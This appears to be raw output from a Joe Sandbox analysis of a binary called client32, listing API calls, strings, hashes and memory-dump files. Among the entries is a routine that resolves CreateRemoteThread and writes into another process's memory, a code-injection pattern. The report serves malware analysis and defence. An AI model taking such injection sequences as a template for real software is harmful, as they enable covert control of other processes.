                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalInitializeSection$CreateEvent
                                                                                                                                                                                                    • String ID: *MaxRxPending$*TraceRecv$*TraceSend$General$_debug
                                                                                                                                                                                                    • API String ID: 57637462-2298398812
                                                                                                                                                                                                    • Opcode ID: 101c914b05177881ec245bda3357267694e324779d68a357ac5e1a99ed44891f
                                                                                                                                                                                                    • Instruction ID: 70b4afe334662900ba144283dba1d254b6ac8626561bf164637f2426a4e69d92
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 101c914b05177881ec245bda3357267694e324779d68a357ac5e1a99ed44891f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD419EB5A003859FDB11CF65CC84FDA7BE9FB84304F0480AAEE499F286D771A504CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(Kernel32,BBC4A55B,?,00000130,00000000), ref: 1110B2B7
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateRemoteThread), ref: 1110B2D3
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ExitThread), ref: 1110B2FB
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1110B31B
                                                                                                                                                                                                    • GetThreadContext.KERNEL32(00000000,00010003), ref: 1110B335
                                                                                                                                                                                                    • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 1110B353
                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 1110B37C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$ContextErrorHandleLastMemoryModuleProcessQueryThreadVirtualWrite
                                                                                                                                                                                                    • String ID: CreateRemoteThread$ExitThread$Kernel32
                                                                                                                                                                                                    • API String ID: 2506007406-954188167
                                                                                                                                                                                                    • Opcode ID: 207106952b3bf2e8a718348c9896f8b1116ab77e8e3a14b9ad5e717d8d90e138
                                                                                                                                                                                                    • Instruction ID: 97ed16d7b0c3fa5e0af1d235dd7a19e0829cf9589d7be3395e73c9348ca53aec
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 207106952b3bf2e8a718348c9896f8b1116ab77e8e3a14b9ad5e717d8d90e138
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C3193B5D4522AAFEB11CF65CC88BAEF7B8FB44314F1081B9E919E6240DB309A40CF55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 11140450: GetTickCount.KERNEL32 ref: 111404B8
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029126
                                                                                                                                                                                                    • Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 11029151
                                                                                                                                                                                                    • Info. assert, restarting..., xrefs: 1102920D
                                                                                                                                                                                                    • Client32, xrefs: 11029185
                                                                                                                                                                                                    • V12.10F4, xrefs: 11029143
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExitProcess$CountErrorLastMessageTickwsprintf
                                                                                                                                                                                                    • String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F4
                                                                                                                                                                                                    • API String ID: 2829780398-3703414834
                                                                                                                                                                                                    • Opcode ID: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
                                                                                                                                                                                                    • Instruction ID: 0c35b4c0934c547b9efc755c54c54cf2bc7aea1eab2dc2738ce497f42af58575
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D310B75A0122AAFE711DFE5CCC5FBAB7A9EB4470CF104028F72587281E670A940CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32 ref: 689DF9FE
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ADVAPI32.DLL), ref: 689DFA34
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DecodeLibraryLoadPointer
                                                                                                                                                                                                    • String ID: ADVAPI32.DLL$SystemFunction036
                                                                                                                                                                                                    • API String ID: 1161192200-1064046199
                                                                                                                                                                                                    • Opcode ID: 1cf91921d5fd24f562614f87b06e2bc4f02de9a45a6641bced19b742186b7a6f
                                                                                                                                                                                                    • Instruction ID: 129241ac924447985304fb776b3a2248ede97651eeade099a6ff90aaf1f1185d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cf91921d5fd24f562614f87b06e2bc4f02de9a45a6641bced19b742186b7a6f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B221C675648A11EFDB266B79DD09A5E3AACDF5576CB818025F505EB200FBB0C800C7E9
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1106D752
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1106D794
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106D8ED
                                                                                                                                                                                                      • Part of subcall function 110B74B0: ExitProcess.KERNEL32 ref: 110B74F2
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1106D907
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106D942
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterExitLeaveProcesswsprintf$ErrorLastMessage
                                                                                                                                                                                                    • String ID: !bSentLogin$%02x $..\ctl32\Connect.cpp$Connect, Send AudioFmt, mode=%d, smp/s=%d, bits=%d$connSend (s%d) %-4u bytes: %s$idata->tr
                                                                                                                                                                                                    • API String ID: 3110362878-53846019
                                                                                                                                                                                                    • Opcode ID: f75333511592cf7d025dfd2695298ef205cbb211f1cccbf7e402962bfbc47190
                                                                                                                                                                                                    • Instruction ID: b005bbbf86a2aeefda8018e92f444acb07036c4399e8eb2cb45e310cd2175a63
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f75333511592cf7d025dfd2695298ef205cbb211f1cccbf7e402962bfbc47190
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19B1C475E0074A9FDB11CF64C884BEFB7E9FF84314F104559E8AA4B281E774A984CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11045544
                                                                                                                                                                                                    • IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 110454E6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$FreeString
                                                                                                                                                                                                    • String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
                                                                                                                                                                                                    • API String ID: 2011556836-2400621309
                                                                                                                                                                                                    • Opcode ID: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
                                                                                                                                                                                                    • Instruction ID: 400cf60c0998823ea0bb6020a3248241c8ed3d764918c69dd9f09d3b4840e21c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE816471E0021A9BDB20DF54CC90BAAB3B5EF88714F1045E8D909D7A84EB75AE81CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,BBC4A55B), ref: 11059069
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110590CE
                                                                                                                                                                                                    • timeGetTime.WINMM ref: 110590FC
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11059136
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591AA
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110591C4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591E9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
                                                                                                                                                                                                    • String ID: _License$maxslaves
                                                                                                                                                                                                    • API String ID: 3724810986-253336860
                                                                                                                                                                                                    • Opcode ID: 1a5778744d7334ab928a4606c54cc66baf7cb7b46047f7e118299d17b48d35e6
                                                                                                                                                                                                    • Instruction ID: b9473765ee5a894416c22d4106f00ac8eee3be5f778696d0a0a90b9ce83e720c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a5778744d7334ab928a4606c54cc66baf7cb7b46047f7e118299d17b48d35e6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49518E71E006269BCB85CFA5C884A6EFBF9FB49704B10866DE925D7244F730E910CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetOverlappedResult.KERNEL32(?,BBC4A31B,FFFFFFFF,00000001), ref: 1100B7AC
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1100B7B6
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1100B819
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1100B856
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1100B90F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                                                                                                                                                                    • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                                                                                                                                                                    • API String ID: 3598861413-432254317
                                                                                                                                                                                                    • Opcode ID: 88086ed7cad01db98769a6e7f02a836ab8858efd9f4792b07cbe4e8a26896150
                                                                                                                                                                                                    • Instruction ID: bce60c6a70f4087aecce3b408ab27d19c814a1bd4bae8f21e2f5314e0b08db4f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88086ed7cad01db98769a6e7f02a836ab8858efd9f4792b07cbe4e8a26896150
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E751D4B8D00A1AABE710DF65CC84ABBB7F8EF44748F10855DF96A92281E7347580C7A5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PostMessageA.USER32(0000FFFF,0000C1FF,00000000,00000000), ref: 1104B225
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,0000048F,00000032,00000000), ref: 1104B256
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,00000483,00000000,00000000), ref: 1104B268
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,0000048F,000000C8,00000000), ref: 1104B27C
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,00000483,00000001,?), ref: 1104B293
                                                                                                                                                                                                    • PostMessageA.USER32(0001048A,00000800,00000000,00000000), ref: 1104B2A4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MessagePost
                                                                                                                                                                                                    • String ID: Client$UnloadMirrorOnEndView$tVPq
                                                                                                                                                                                                    • API String ID: 410705778-2026197083
